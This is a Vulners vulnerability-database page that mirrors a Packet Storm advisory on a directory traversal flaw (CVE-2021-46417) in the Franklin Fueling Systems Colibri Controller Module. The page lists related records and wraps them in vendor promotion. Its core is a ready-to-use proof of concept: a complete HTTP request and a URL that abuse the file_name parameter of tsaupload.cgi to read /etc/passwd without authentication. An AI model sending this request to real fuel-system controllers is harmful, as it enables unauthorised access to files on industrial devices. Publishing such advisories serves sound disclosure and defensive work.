Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FFS Colibri Controller Module 1.8.19.8580 Directory Traversal

šŸ—“ļøĀ 07 Apr 2022Ā 00:00:00Reported byĀ Momen EldawakhlyTypeĀ 
packetstorm
Ā packetstormšŸ”—Ā packetstormsecurity.comšŸ‘Ā 276Ā Views

FFS Colibri Controller Module 1.8.19.8580 Directory Traversal vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		FFS Colibri Controller Module 1.8.19.8580 Directory Traversal Vulnerability
7 Apr 202200:00
ā€“zdt
0day.today		Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion Vulnerability
11 Apr 202200:00
ā€“zdt
GithubExploit		Exploit for Path Traversal in Franklinfueling Colibri_Firmware
18 May 202209:14
ā€“githubexploit
Circl		CVE-2021-46417
7 Apr 202214:33
ā€“circl
CNNVD		Franklin Fueling Systems č·Æå¾„éåŽ†ę¼ę“ž
7 Apr 202200:00
ā€“cnnvd
CVE		CVE-2021-46417
7 Apr 202210:55
ā€“cve
Cvelist		CVE-2021-46417
7 Apr 202210:55
ā€“cvelist
Exploit DB		Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
11 Apr 202200:00
ā€“exploitdb
Nuclei		Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
1 Jun 202605:38
ā€“nuclei
NVD		CVE-2021-46417
7 Apr 202211:15
ā€“nvd
Rows per page
`==============[ Author ]==============  
= Name: Momen Eldawakhly (Cyber Guy)  
= Company: Cypro.se  
======================================  
  
==============[ Product ]==============  
= Vendor: Franklin Fueling Systems  
= Product: FFS Colibri Controller Module  
= Version: 1.8.19.8580  
======================================  
  
  
============[ HTTP Exploitation ]============  
  
GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1  
Host: 192.168.1.6  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B  
Upgrade-Insecure-Requests: 1  
  
============[ URL Exploitation ]============  
  
http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=  
  
  
`

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Apr 2022 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.92171
momen eldawakhlycypro.sefranklin fueling systemshttp exploitationurl exploitationdirectory traversal
276